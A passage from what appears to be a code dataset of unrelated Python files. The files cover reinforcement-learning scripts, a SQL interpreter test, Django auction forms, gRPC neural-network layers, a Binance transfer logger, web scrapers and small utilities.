monitor_dir = './' + filename + '_' + str(datetime.now())
env = wrappers.Monitor(env, monitor_dir)
total_rewards, model = random_search(env, model, gamma)
print("max reward:", np.max(total_rewards))
# play 100 episodes and check the average
avg_totalrewards = series(env, 100, model, gamma, print_iters=True)
print("avg reward over 100 episodes with best models:", avg_totalrewards)
plt.plot(total_rewards)
plt.title("Rewards")
plt.show()
if __name__ == '__main__':
main() |
6,357 | b3ee76bc0d93135d0908044a2424dd927a390007 | import os
from sql_interpreter.tables.csv_table import CsvTable
from sql_interpreter.interpreter import SqlInterpreter
from sql_interpreter.cli import Cli
class InterpreterTest():
def setUp(self):
self.interpreter = SqlInterpreter()
self.cli = Cli(self.interpreter)
filename = os.path.join(
os.path.dirname(__file__), 'resources/employees.csv')
self.interpreter.load(CsvTable('employees', filename))
filename = os.path.join(
os.path.dirname(__file__), 'resources/departments.csv')
self.interpreter.load(CsvTable('departments', filename))
def tearDown(self):
self.interpreter.unload_all()
def test_select_1(self):
sql = '''select
id, first_name || ' ' || last_name as full_name, salary - 1000
from employees;'''
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_2(self):
sql = '''select
e.id, last_name, department_id, departments.id, name
from employees e, departments;'''
self.cli.execute(sql)
self.cli.print_new_line()
def test_select_all(self):
code = '''select * from employees;'''
self.interpreter.interpret(code)
self.cli.print_new_line()
def test_select_distinct(self):
sql = '''select distinct
departments.id as dep_id, employees.salary as sal
from employees, departments
order by dep_id, sal desc;'''
self.cli.execute(sql)
self.cli.print_new_line()
if __name__ == '__main__':
test = InterpreterTest()
test.setUp()
test.test_select_1()
test.test_select_2()
test.test_select_distinct()
test.tearDown()
|
6,358 | 8cd50e1f0e0feb4d753443220f9fa9065e80e0ef | from concurrent.futures import ProcessPoolExecutor
from nltk import PorterStemmer, RegexpTokenizer
from stop_words import get_stop_words
class Preprocessor(object):
def __init__(self, max_workers=4):
self.max_workers = max_workers
self.tokenizer = RegexpTokenizer(r"\w+")
self.en_stopwords = set(get_stop_words("en"))
self.p_stemmer = PorterStemmer()
def preprocess_doc(self, doc):
tokens = self.tokenizer.tokenize(doc.lower())
stopped_tokens = [i for i in tokens if i not in self.en_stopwords]
stemmed_tokens = [self.p_stemmer.stem(i) for i in stopped_tokens]
return stemmed_tokens
def process_docs(self, doc_list):
with ProcessPoolExecutor(max_workers=self.max_workers):
return [self.preprocess_doc(doc) for doc in doc_list]
def preprocess_doc_with_url(self, doc_with_url):
with ProcessPoolExecutor(max_workers=self.max_workers):
url, content = doc_with_url
return url, self.preprocess_doc(content)
def process_docs_with_urls(self, urldoc_list):
return [self.preprocess_doc_with_url(urldoc) for urldoc in urldoc_list]
class WithUrlPreprocessor(Preprocessor):
def __init__(self, max_workers=4):
super().__init__(max_workers=max_workers)
def preprocess_doc(self, doc):
_, content = doc
return super().preprocess_doc(content)
|
6,359 | 548a236c4c485091d312593dcb0fa331ff98f1a8 | import sys
import os
import utils
def run(name, dim_k, dump='dump', add_cmd=''):
res = all_res[name]
model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'
cmd = f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'
print(cmd)
ret = os.system(cmd)
if ret != 0:
input('Error!!!!!!')
all_res = dict(
id_att_3='id_att_3',
id_last='id_last',
c_att_5='c_att_5',
c_last='c_last',
)
def main():
run('id_att_3', 1024, dump='dump')
run('id_last', 1024, dump='dump')
run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')
run('c_last', 256, dump='dump')
run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')
run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')
run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')
run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')
if __name__ == '__main__':
main() |
6,360 | 5215b5e4efe2e126f18b3c4457dc3e3902923d49 | from django import forms
from django.forms import inlineformset_factory
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.auth.models import User
from django.conf import settings
from django.db.models import Max
from auction.models import *
from datetime import *
from decimal import *
import re
class UserForm(forms.ModelForm):
error_email = {
'email_exist': _("Email allready exist."),
}
error_password = {
'password_less': _("Password should be more than 6 characters."),
}
password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
class Meta:
model = User
fields = ('first_name', 'last_name', 'email')
def __init__(self, *args, **kwargs):
super(UserForm, self).__init__(*args, **kwargs)
self.fields['email'].required = True
for field_name in self.fields:
field = self.fields.get(field_name)
if field:
field.widget.attrs.update({'class': 'form-control input-lg', 'placeholder': field.label,
'autocomplete': 'off'})
def clean_email(self):
email = self.cleaned_data.get("email")
check = User.objects.filter(email=email)
if self.instance.email == email:
return email
else:
if len(check) > 0:
raise forms.ValidationError(
_("This email address is already in use. Please supply a different email address."))
return email
def clean_password(self):
password = self.cleaned_data.get("password")
if len(password) < 6:
raise forms.ValidationError(
_("Password should be more than 6 characters."))
return password
def save(self, commit=True):
user = super(UserForm, self).save(commit=False)
user.username = self.cleaned_data["email"]
user.set_password(self.cleaned_data["password"])
if commit:
user.save()
return user
class ProfileForm(forms.ModelForm):
class Meta:
model = Profile
exclude = ('id',)
def __init__(self, *args, **kwargs):
super(ProfileForm, self).__init__(*args, **kwargs)
for field_name in self.fields:
field = self.fields.get(field_name)
if field:
field.widget.attrs.update({'class': 'form-control input-lg', 'placeholder': field.label,
'autocomplete': 'off'})
UserProfileForm = inlineformset_factory(User, Profile, form=ProfileForm, extra=1, can_delete=False)
class AuctionForm(forms.ModelForm):
class Meta:
model = Auction
exclude = ('account', 'slug', 'status', 'winner', 'is_active',)
def __init__(self, *args, **kwargs):
super(AuctionForm, self).__init__(*args, **kwargs)
for field_name in self.fields:
field = self.fields.get(field_name)
if field:
field.widget.attrs.update({'class': 'form-control input-lg', 'placeholder': field.label, 'autocomplete': 'off'})
if field and field_name == 'expire':
field.widget.attrs.update({'class': 'form-control input-lg datepicker'})
def clean_expire(self):
expire = self.cleaned_data.get("expire").date()
if expire < (date.today() + timedelta(days=3)):
raise forms.ValidationError(_("Expire should be 72 hour from now on."))
return expire
class BidAuction(forms.ModelForm):
class Meta:
model = Bid
exclude = ('id', 'auction', 'bidder',)
def __init__(self, *args, **kwargs):
self.auction = kwargs.pop('auction', None)
super(BidAuction, self).__init__(*args, **kwargs)
for field_name in self.fields:
field = self.fields.get(field_name)
if field:
field.widget.attrs.update({'class': 'form-control input-lg', 'placeholder': field.label, 'autocomplete': 'off'})
def clean_bid_price(self):
qs = Bid.objects.filter(auction = self.auction).aggregate(Max('bid_price'))['bid_price__max']
if qs is None:
qs = self.auction.price.amount
price = self.cleaned_data.get("bid_price")
# min_price = qs + (self.auction.price.amount * 5) / 100
min_price = qs + Decimal(0.05)
if price < min_price:
raise forms.ValidationError(_("Price should be more than %s." % "{0:.2f}".format(min_price)))
return price
|
6,361 | fa6f251f27b645fc6827285b5578fd9634c8bb30 | import gzip
import pickle as pkl
import time
from datetime import datetime
import grpc
import numpy as np
from sklearn.utils import shuffle
import neural_nets_pb2 as nn_pb
import neural_nets_pb2_grpc as nn_pb_grpc
from mnist_loader import load_data
from activations import *
# pylint: disable=too-many-arguments
class Layer(nn_pb_grpc.LayerDataExchangeServicer):
"""
abstract layer extract common methods
"""
# pylint: disable=too-many-arguments
def __init__(self, layer_name, upper_layer, lower_layer,
lower_layer_nodes, current_layer_nodes,
nonlin, nonlin_prime):
"""
datasets : the path of mnist dataset
nonlin: activation function
nonlin_prime: the derivative of activation function
"""
self.layer_name = layer_name
self.upper_layer_addr = upper_layer
self.lower_layer_addr = lower_layer
self.nonlin = nonlin
self.nonlin_prime = nonlin_prime
# lazy initialization
self.upper_layer_stub = None
self.lower_layer_stub = None
# weights dimension
self.weights_shape = (current_layer_nodes, lower_layer_nodes)
self.weights = None
self.biases = None
# record outputs from lower layer
# use batch id as key
# Purposes:
# 1) used for computing the weighted sum of current layer
# 2) used for computing the gradients for updating weights of current layer
self.lower_layer_outputs = {}
# computed from lower layer outputs for cache purpose
# cache for computing delta for current layer
# delta = partial_delta_rec * nonlin_prime(weighted_sum)
# with different batch we have different weighted sum
self.weighted_sum_inputs = {}
def forward_to_upper(self, batch_id, forward_matrix, forward_labels, istrain):
"""
forward output to upper layer
"""
if not self.upper_layer_stub:
self.create_upper_stub()
# convert numpy array to byte string
bytes_matrix = pkl.dumps(forward_matrix, 2)
bytes_labels = pkl.dumps(forward_labels, 2)
# send message to next layer
res = self.upper_layer_stub.UpdateInput(
nn_pb.ForwardMsg(batch_id=batch_id,
output_matrix=bytes_matrix,
labels=bytes_labels,
is_train=istrain))
# print("get response form upper layer", res.message)
def backward_to_lower(self, batch_id, partial_delta, labels):
"""
back propagate error partial_delta to lower layer
partial_delta = dot(self.weights.T, self.delta)
self.delta = delta_received_from_upper * nonlin_prime(z)
"""
# create stub for lower layer
if not self.lower_layer_stub:
self.create_lower_stub()
# convert partial_delta matrix to bytes string
bytes_delta = pkl.dumps(partial_delta)
bytes_labels = pkl.dumps(labels)
res = self.lower_layer_stub.UpdateDelta(
nn_pb.BackwardMsg(batch_id=batch_id,
partial_delta=bytes_delta,
labels=bytes_labels))
# print("get response from lower layer", res.message)
def create_upper_stub(self):
""" create upper_layer_stub for exchanging data between grpc"""
if self.upper_layer_addr:
channel = grpc.insecure_channel(self.upper_layer_addr)
self.upper_layer_stub = nn_pb_grpc.LayerDataExchangeStub(channel)
else:
print("no upper layer has been specified")
def create_lower_stub(self):
""" stub for lower layer communication"""
if self.lower_layer_addr:
channel = grpc.insecure_channel(self.lower_layer_addr)
self.lower_layer_stub = nn_pb_grpc.LayerDataExchangeStub(channel)
else:
print("no lower layer has been specified")
def init_weights(self, load_weights=None):
"""
if load_weights is specified load the trained weights
"""
if load_weights:
# TODO
pass
else:
# x: lower layer nodes n
# y: current layer nodes n
x = self.weights_shape[1]
y = self.weights_shape[0]
self.weights = np.random.randn(y, x) / np.sqrt(x) # pylint: disable=no-member
self.biases = np.random.randn(y, 1) # pylint: disable=no-member
def check_weights(self):
if self.weights is None or self.biases is None:
print("Weights of {} have not initialized".format(self.layer_name))
import sys
sys.exit(-1)
def update_weights(self, lr, delta, outputs_of_lower):
"""
outputs of lower: equals to inputs of this layer
"""
delta_shape = delta.shape
inputs_shape = outputs_of_lower.shape
# update biases
avg_delta = np.mean(delta, axis=0).reshape(delta_shape[1], 1)
self.biases = self.biases - lr * avg_delta
# compute gradients for weights
delta = delta.reshape(delta_shape[0], delta_shape[1], 1)
inputs = outputs_of_lower.reshape(inputs_shape[0], 1, inputs_shape[1])
gradients = delta * inputs
gradients_avg = np.mean(gradients, axis=0)
self.weights = self.weights - lr * gradients_avg
def parse_forward_msg(self, req):
""" extract and transform data in forward message"""
batch_id = req.batch_id
bytes_outputs_of_lower = req.output_matrix
bytes_labels = req.labels
is_train = req.is_train
outputs_of_lower = pkl.loads(bytes_outputs_of_lower)
labels = pkl.loads(bytes_labels)
return batch_id, outputs_of_lower, labels, is_train
# implementing rpc services
def UpdateInput(self, request, context):
# implemented in Hidden Layer and Output Layer
pass
def UpdateDelta(self, request, context):
""" Invoked by upper layer
will be implemented by hidden layer
"""
pass
class InputLayer(Layer):
""" for input data"""
def __init__(self, upper_layer, data_path, input_dim, layer_name="input"):
super().__init__(layer_name, upper_layer,
None, None, input_dim,
None, None)
self.train, self.val, self.test = load_data(data_path)
def start_feed_data(self, batch_size, epochs):
""""""
train_X = self.train[0]
train_y = self.train[1]
val_X = self.val[0]
val_y = self.val[1]
train_size = train_X.shape[0]
batch_id = 0
test_batch_id = -1 # use negative number, diff with batch_id
for i in range(epochs):
print("Start feed {0} epoch data".format(i))
train_X, train_y = shuffle(train_X, train_y)
for j in range(0, train_size, batch_size):
minibatch_X = train_X[j:j+batch_size]
minibatch_y = train_y[j:j+batch_size]
self.forward_to_upper(batch_id, minibatch_X, minibatch_y, True)
batch_id += 1
# send test data for evaluation
self.forward_to_upper(test_batch_id, val_X, val_y, False)
test_batch_id -= 1
def UpdateInput(self, req, ctx):
""""""
print("Should not have lower layer")
return nn_pb.PlainResponse(message="Wrong invoke!")
def UpdateDelta(self, req, ctx):
""""""
batch_id = req.batch_id
if batch_id % 100 == 0:
print("Complete backpropagation for batch {} at {}".format(
batch_id,
datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
return nn_pb.PlainResponse(message="Received at layer {}".format(
self.layer_name))
class HiddenLayer(Layer):
""" hidden layer"""
def __init__(self, layer_name,
upper_layer,
lower_layer,
lower_layer_size,
layer_size,
nonlin,
nonlin_prime,
learning_rate,
enable_synthetic_gradients,
sg_learning_rate
):
"""
enable_synthetic_gradients: whether use synthetic gradients
to do error approximating
"""
super().__init__(layer_name, upper_layer,
lower_layer, lower_layer_size,
layer_size, nonlin,
nonlin_prime)
self.lr = learning_rate
self.enable_sg = enable_synthetic_gradients
self.sg_lr = sg_learning_rate
self.sg_weights = None
self.sg_deltas = {}
def init_sg_weights(self):
""" using linear synthetic gradients model
SG(h, y) = hA + yB + C
refer to paper, Understanding synthetic gradients and decoupled neural networks
"""
n = self.weights_shape[0] # size of current layer
# pylint: disable=no-member
A = np.random.randn(n, n) / np.sqrt(n)
B = np.random.randn(10, n) / np.sqrt(n)
C = np.random.randn(1, n) / np.sqrt(n)
# pylint: enable=no-member
self.sg_weights = [A, B, C]
def check_sg_weights(self):
if self.sg_weights is None:
self.init_sg_weights()
def SG(self, h, y):
""" generate delta by weighted sum and label
h: outputs of this layer
y: labels for this batch
"""
self.check_sg_weights()
A = self.sg_weights[0] #(n, n)
B = self.sg_weights[1] #(10, n)
C = self.sg_weights[2] #(1, n)
delta = np.matmul(h, A) + np.matmul(y, B) + C
return delta
def update_sg_weights(self, true_delta, batch_id):
""" name conventions refer paper :
Understanding synthetic gradients and decoupled neural interface
TODO: synthetic gradient estimates the partial delta instead true gradients
"""
sg_delta = self.sg_deltas[batch_id]
weighted_sum = self.weighted_sum_inputs[batch_id]
labels = self.lower_layer_outputs[batch_id]['labels']
y = labels
h = self.nonlin(weighted_sum)
Err = sg_delta - true_delta
A = self.sg_weights[0] - self.sg_lr * 2 * np.dot(h.transpose(), Err) / h.shape[0]
B = self.sg_weights[1] - self.sg_lr * 2 * np.dot(y.transpose(), Err) / y.shape[0]
C = self.sg_weights[2] - self.sg_lr * 2 * np.mean(Err, axis=0)
self.sg_weights = [A, B, C]
# del stored delta
del self.sg_deltas[batch_id]
def UpdateInput(self, request, context):
""" Invoked by lower layer
Once inputs updated, start computing the weighted sum
then activation outputs,
then forward outputs to next layer
request: ForwardMsg
"""
self.check_weights()
# get values from message
batch_id, outputs_of_lower, labels, is_train = self.parse_forward_msg(request)
print("Get inputs id: {0}, matrix shape: {1}, labels shape: {2}".format(
batch_id, outputs_of_lower.shape, labels.shape))
weighted_sum = np.dot(outputs_of_lower, self.weights.transpose()) \
+ self.biases.transpose()
# saving inputs during training, because for weights updating
if is_train:
inputs = {'matrix': outputs_of_lower,
'labels': labels}
self.lower_layer_outputs[batch_id] = inputs
self.weighted_sum_inputs[batch_id] = weighted_sum
activations = self.nonlin(weighted_sum) # apply element wise
# update weights immediately with SG, if enabled SG
if self.enable_sg and is_train:
print("update weights based on SG delta")
sg_delta = self.SG(activations, labels)
# TODO use sg_delta to compute the gradients by sg_delta * self.nonline_prime(z)
self.update_weights(self.lr, sg_delta, outputs_of_lower)
self.sg_deltas[batch_id] = sg_delta
# forward layer outputs
self.forward_to_upper(batch_id, activations, labels, is_train)
print("batch id: {0}, activations shape {1}".format(
batch_id, activations.shape))
# return received
return nn_pb.PlainResponse(message="Inputs received by layer {}".format(
self.layer_name))
def UpdateDelta(self, req, ctx):
"""
delta shape: (batch_size, size_of_current_layer)
req: BackwardMsg
"""
batch_id = req.batch_id
bytes_partial_delta = req.partial_delta
partial_delta = pkl.loads(bytes_partial_delta)
bytes_labels = req.labels # variable currently not useful
labels = pkl.loads(bytes_labels)
# compute delta for current layer
z = self.weighted_sum_inputs[batch_id]
z_nonlin_prime = self.nonlin_prime(z)
# shape of delta: (batch_size, size_of_layer)
delta = partial_delta * z_nonlin_prime
# compute partial delta for lower layer
partial_delta_for_lower = np.dot(delta, self.weights)
# send partial delta to lower layer
self.backward_to_lower(batch_id,
partial_delta_for_lower,
labels)
if self.enable_sg:
# train the SG
# TODO pass partial delta instead
self.update_sg_weights(delta, batch_id)
else:
# update weights regularly
inputs = self.lower_layer_outputs[batch_id]['matrix']
self.update_weights(self.lr, delta, inputs)
# delete stored for weighted sum
del self.weighted_sum_inputs[batch_id]
# delete stored for lower layer outputs
del self.lower_layer_outputs[batch_id]
return nn_pb.PlainResponse(
message="Partial delta received at {}".format(self.layer_name))
class OutputLayer(Layer):
""" output layer
computing the error based on labels and prediction
using softmax as output activations and cross entropy loss
"""
def __init__(self, layer_name, lower_layer, lower_layer_size,
num_classes, learning_rate ):
super().__init__(layer_name, None,
lower_layer,
lower_layer_size,
num_classes,
None,
None)
self.lr = learning_rate
def UpdateInput(self, req, ctx):
""" once received input from lower layer:
compute weighted sum -> softmax output -> loss -> back propagate
"""
self.check_weights()
batch_id, outputs_of_lower, labels, is_train = self.parse_forward_msg(req)
weighted_sum = np.dot(outputs_of_lower, self.weights.transpose()) \
+ self.biases.transpose()
softmax_output = softmax(weighted_sum, axis=1)
# print("weighted sum", weighted_sum)
# print("outputs of lower", outputs_of_lower)
if is_train:
delta = softmax_output - labels
# compute delta for lower layer first
# because current error is based on current weights
partial_delta_for_lower = np.dot(delta, self.weights)
# send to lower layer
self.backward_to_lower(batch_id, partial_delta_for_lower, labels)
# cross entropy loss
if batch_id % 100 == 0:
total_loss = np.log(softmax_output) * labels # pylint: disable=no-member
# print("total loss: ", np.sum(total_loss))
loss = -1 * np.sum(total_loss) / labels.shape[0]
print("For batch id {}, avg loss: {}".format(batch_id, loss))
# update weights
self.update_weights(self.lr, delta, outputs_of_lower)
else:
# test evaluation
pred_results = np.argmax(softmax_output, axis=1)
matched = sum(int(y == t) for (y, t) in zip(pred_results, labels))
print("Epoch {}, Performance test {} / {}".format(
-1*batch_id, matched, labels.shape[0]))
return nn_pb.PlainResponse(message="Inputs received at {}".format(
self.layer_name))
def UpdateDelta(self, req, ctx):
""" No upper layer"""
print("Error: No upper layer for output layer")
return nn_pb.PlainResponse(message="Invalid Operation!!")
|
6,362 | ddbcc8e768f93a0b4f8776b19e752c57feb5bbf9 | #!/usr/bin/env python
#coding=utf-8
from datetime import *
import unittest
def getSnapshot(historyData, id):
data = historyData.split('\n')
lines = len(data)
if lines < 2 :
return 'Input is too short!'
index = 0
curid = ''
idlist = dict()
recordtime = ''
animal_pos = dict()
for i in range(lines):
if len(data[i]) > 0:#id行
if index == 0: #可能有id为空的情况未处理
curid = data[i]
index += 1
if curid in idlist:#检查id是否冲突
return 'Conflict found at ' + curid
else:
idlist[curid] = 1#保存新id
elif index == 1:#日期行
if len(data[i]) == 0:#检查日期是否为空
return 'Conflict found at ' + curid
recordtime = data[i]
index += 1
try:#检查日期格式是否正确
t1 = datetime.strptime(recordtime, '%Y/%m/%d %H:%M:%S')
except:
return 'Invalid format.'
else:#数据行
animal = data[i].split(' ')
if len(animal) == 3:#如果是新动物,检查以前是否出现过
if animal[0] in animal_pos:
return 'Conflict found at ' + curid
else:
animal_pos[animal[0]] = [animal[1], animal[2]]
elif len(animal) == 5:#如果是旧动物,检查以前是否出现过
if animal[0] not in animal_pos:
return 'Conflict found at ' + curid
else:#如果确实是旧动物,校验位置信息
ox = animal_pos[animal[0]][0]
oy = animal_pos[animal[0]][1]
if (ox != animal[1]) or (oy != animal[2]):#校验失败
return 'Conflict found at ' + curid
else:#校验成功,更新位置信息
animal_pos[animal[0]][0] = str(int(animal_pos[animal[0]][0]) + int(animal[3]))
animal_pos[animal[0]][1] = str(int(animal_pos[animal[0]][1]) + int(animal[4]))
else:#一个快照数据读入完毕
index = 0
if(id == curid) and (index == 0 or i == lines-1):#查询的id就是当前快照点
res = ''
for k, v in animal_pos.iteritems():#拼接字符串
tmp = k + ' ' + v[0] + ' ' + v[1]
res += (tmp + '\n')
return res
|
6,363 | 1d29ce58ca626155d626216fbbd70d7b241efa25 | import ccxt
import json
import time
from baglanti import mysql_baglan
import datetime
import requests
from urllib.parse import urljoin
import sys
db = mysql_baglan("bingo")
cursor = db.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
sql = "SELECT apikey,secret,id FROM `users` WHERE status = '1' order by id desc"
cursor.execute(sql)
results = cursor.fetchall()
column_names = ['apikey', 'secret', 'id']
for row in results:
user = dict(zip(column_names, row))
print(user['id'])
exchange = ccxt.binance({
'apiKey': user['apikey'],
'secret': user['secret'],
'enableRateLimit': True
})
#BTC
if exchange.has['fetchDeposits']:
withdrawals = exchange.fetch_withdrawals()
set_data = []
for withdraw in withdrawals:
date_time = int(withdraw['timestamp'])/1000
date_time = datetime.datetime.fromtimestamp(date_time)
set_data.append([user['id'], withdraw['currency'], withdraw['txid'], withdraw['address'], withdraw['type'], withdraw['amount'], withdraw['status'], withdraw['fee']['cost'],date_time])
sqlguncelleme = "INSERT INTO transfers (user_id, currency, txid, address, type, amount, status, fee, datetime) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s) ON DUPLICATE KEY UPDATE user_id=(user_id)"
cursor.executemany(sqlguncelleme, set_data,)
db.commit()
withdrawals = exchange.fetch_deposits()
set_data = []
for withdraw in withdrawals:
date_time = int(withdraw['timestamp'])/1000
date_time = datetime.datetime.fromtimestamp(date_time)
set_data.append([user['id'], withdraw['currency'], withdraw['txid'], withdraw['address'], withdraw['type'], withdraw['amount'], withdraw['status'], '0',date_time])
sqlguncelleme = "INSERT INTO transfers (user_id, currency, txid, address, type, amount, status, fee, datetime) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s) ON DUPLICATE KEY UPDATE user_id=(user_id)"
cursor.executemany(sqlguncelleme, set_data,)
db.commit()
|
6,364 | fab1d2270ae906ca92cf3be2c2d9767737ea6083 | #!/usr/bin/env python
#coding:utf-8
import sys
import time
reload(sys)
sys.setdefaultencoding('utf8')
from bs4 import BeautifulSoup
import requests
import csv
import codecs
import xlwt
#from word_power_dict import get_url_dict
#from Vocabulary_Toefl_MP3s_5000_Words_Memory_Course_dict import get_url_dict
#from new_parade_1_dict import get_url_dict
#from new_parade_1_dict import name as xlsname
#from new_parade_2.new_parade_2_dict import get_url_dict
#from new_parade_2.new_parade_2_dict import name as xlsname
#from new_parade_3.new_parade_3_dict import get_url_dict
#from new_parade_3.new_parade_3_dict import name as xlsname
from new_parade_4.new_parade_4_dict import get_url_dict
from new_parade_4.new_parade_4_dict import name as xlsname
def check_link(url):
try:
r = requests.get(url)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.text
except Exception as e:
print '----------'
print e
print '----------'
def is_alphabet(uchar):
if (u'\u0041' <= uchar <= u'\u005a') or (u'\u0061' <= uchar <= u'\u007a'):
return True
else:
return False
def save_contents(result):
'''result: all the useful result from urls'''
with codecs.open('merriam.csv', 'w', 'utf_8_sig') as f:
writer = csv.writer(f)
for i in range(len(result)):
try:
if is_alphabet(result[i][1][0]):
writer.writerow([result[i][1], result[i][3]])
print("write in line:", i)
except:
print("error in line:{}, contents is:{}".format(i, result[i]))
workbook = xlwt.Workbook(encoding='utf-8')
ENGLISH_WORD, CHINESE_TRANSLATE = (0, 1)
def write_sheet(unit_info, result):
sheet = workbook.add_sheet(unit_info, cell_overwrite_ok=True)
begin_row = 0
for i in range(len(result)):
try:
if is_alphabet(result[i][1][0]):
sheet.write(begin_row, ENGLISH_WORD, label=result[i][1])
sheet.write(begin_row, CHINESE_TRANSLATE, label=result[i][3])
print("write in line:", i)
begin_row += 1
except:
print("error in line:{}, contents is:{}".format(i, result[i]))
def save_xls(name):
workbook.save(name)
def get_contents(urls):
result = []
for one_url in urls:
content = check_link(one_url)
soup = BeautifulSoup(content, 'lxml')
trs = soup.find_all('tr')
for tr in trs:
ui = []
for td in tr:
ui.append(td.string)
result.append(ui)
time.sleep(1)
return result
'''
def get_urls(url_content, root_url="https://www.shanbay.com"):
ulist = []
soup = BeautifulSoup(url_content, 'lxml')
urls = soup.find_all('a')
for url in urls:
try:
if url.string.startswith('【无老师7天TOEFL】List'):
ulist.append(root_url + url.get('href'))
for j in range(2, 11):
extend_url = root_url + url.get('href') + '?page=' + str(j)
ulist.append(extend_url)
except:
pass
return ulist
'''
def main():
test_url = 'https://www.shanbay.com/wordlist/107125/213385/?page=1'
url_dict = get_url_dict()
for unit_info, url_list in url_dict.items():
result = get_contents(url_list)
write_sheet(unit_info, result)
save_xls(xlsname+'.xls')
main()
|
6,365 | 76905171602cbeb53903a4b0259685288da3a083 | import os
import datetime
import traceback
import json
import requests
import logging
from model import Product
from naver_api import naver_client_id, naver_client_secret
DEBUG = False
if not DEBUG:
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('botocore').setLevel(logging.WARNING)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def lambda_handler(event, context):
# print(naver_client_id)
# print(naver_client_secret)
products = list(Product.scan(Product.do_crawl==True))
for product in products:
product.search_lowest_price()
print('{} product(s) crawled'.format(len(products)))
|
6,366 | 70cef88f3fe93d370e5d21a2b00b761ce530a099 | """
Given a random set of numbers, Print them in sorted order.
Example 1:
Input:
N = 4
arr[] = {1, 5, 3, 2}
Output: {1, 2, 3, 5}
Explanation: After sorting array will
be like {1, 2, 3, 5}.
"""
#complexity--> n*log n
def sortarray(arr):
for i in range(1,len(arr)):
key=arr[i]
j=i-1
while(j>=0 and arr[j]>key):
arr[j+1]=arr[j]
j-=1
arr[j+1]=key
return arr
print(sortarray([1,5,2,3])) |
6,367 | 1e4d18909b72ceef729efdd7b2ab996ace45f1bd | __author__ = 'matthias'
from tcp import *
from data import *
#SERVER = "131.225.237.31"
#PORT = 33487
data = LaserData()
#server = TCP(SERVER, PORT)
server = TCP()
server.start_server()
for i in range(100):
data = server.recv_server()
print data
|
6,368 | 3a053c2c8a2b9123974183e65914dc0f73d2e078 | import glob
import os
import xml.etree.ElementTree as ET
file_dirs = ["train/","test/"]
for file_dir in file_dirs:
fdir = "custom_dataset/" + file_dir
for directory in os.listdir(fdir):
new_location = "/content/gdrive/My Drive/project/custom_dataset/" + file_dir + directory
xml_files = glob.glob(fdir + directory + "/*.xml")
print((fdir + directory + "/" + "*.xml"))
print(len(xml_files))
for xml_file in xml_files:
tree = ET.parse(xml_file)
root = tree.getroot()
filename = root.find('filename')
name = root[1].text
if name[0] == '\\':
name = name[1:]
root[1].text = name
frame_name = root[2].text[root[2].text.rfind('/') +1:]
root[2].text = (new_location + "/" + frame_name)
tree.write(fdir + directory + "/" + frame_name[:-4] + '.xml') |
6,369 | 8220a6d33cda5861e74d6236757abbc81685a998 | # -*- coding: utf-8 -*-
"""
Modul do zapisu piosenki (wczytywanie ustawien (defs.txt), tworzenie .wav,
"zglasnianie utworu")
"""
print("Laduje modul o nazwie: "+__name__)
import numpy as np
def wczytywanie_ustawien(plik_konfiguracyjny = "defs.txt"):
"""
wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika
arg:
str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi
wartosciami parametrow (tempo itd.)
wyjscie:
dict: parametry - zapisane nazwy i wartosci uzywanych parametrow
"""
import re
import numpy as np
# wczytuje zawartosc pliku (bez pierwszej i ostatniej linijki, jeden wiersz
# wyjsciowej macierzy, zawiera nazwe parametru i jego wartosc, jako
# oddzielne elementy, zapisane jako stringi)
ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype = str, \
skip_header=1, skip_footer=1, delimiter=":")
# tworze slownik, ktory bedzie przechowywal wartosci
parametry = {}
# pozbywam się "" z key
# jesli mamy 1 parametr (1 linijka w pliku, to ustawienia to zmienna o
# shape = (2,), wiec odwoluje sie bezposrednio do zmiennej ustawienia
if ustawienia.shape == (2,):
parametry[re.sub('"','',ustawienia[0])] = ustawienia[1]
# jak mamy wiecej parametrow odwoluje sie do kolejnych linijek macierzy
# ustawienia
else:
for l in ustawienia:
parametry[re.sub('"','',l[0])] = l[1]
# zamieniamy napisy na odpowiednie wartosci - kontroluje te parametry, wiec
# robie to recznie
try:
parametry['tryb'] = parametry['tryb'].strip() #tryb
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
print("Podaj tryb odczytu!")
try:
parametry['bpm'] = int(parametry['bpm']) # tempo
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
try:
parametry['freq'] = int(parametry['freq']) # frekwencja wyjsciowego wav
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
try:
parametry['loud'] = float(parametry['loud'] ) # glosnosc
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
try:
# lista wag dla sampli
parametry['wages'] = [float(s) for s in parametry['wages'].split(",")]
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
return parametry
#b = wczytywanie_ustawien("defs.txt")
#zglasnianie utworu
def zmiana_glosnosci(utwor, procent = 0):
"""
zmienia glosnosc utworu (jego amplitudy)
arg:
numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony
lub zciszony
float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga
wartosci od -1 do 1, dla 0 brak zmian, dla 1 - "100%
glosniej", dla -1 "100% ciszej"
wyjscie:
numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor
"""
if(-1 <= procent <= 1):
